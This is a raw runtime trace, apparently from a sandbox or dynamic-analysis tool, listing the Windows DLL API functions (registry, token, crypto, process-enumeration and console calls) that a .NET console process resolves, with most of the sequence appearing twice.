DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
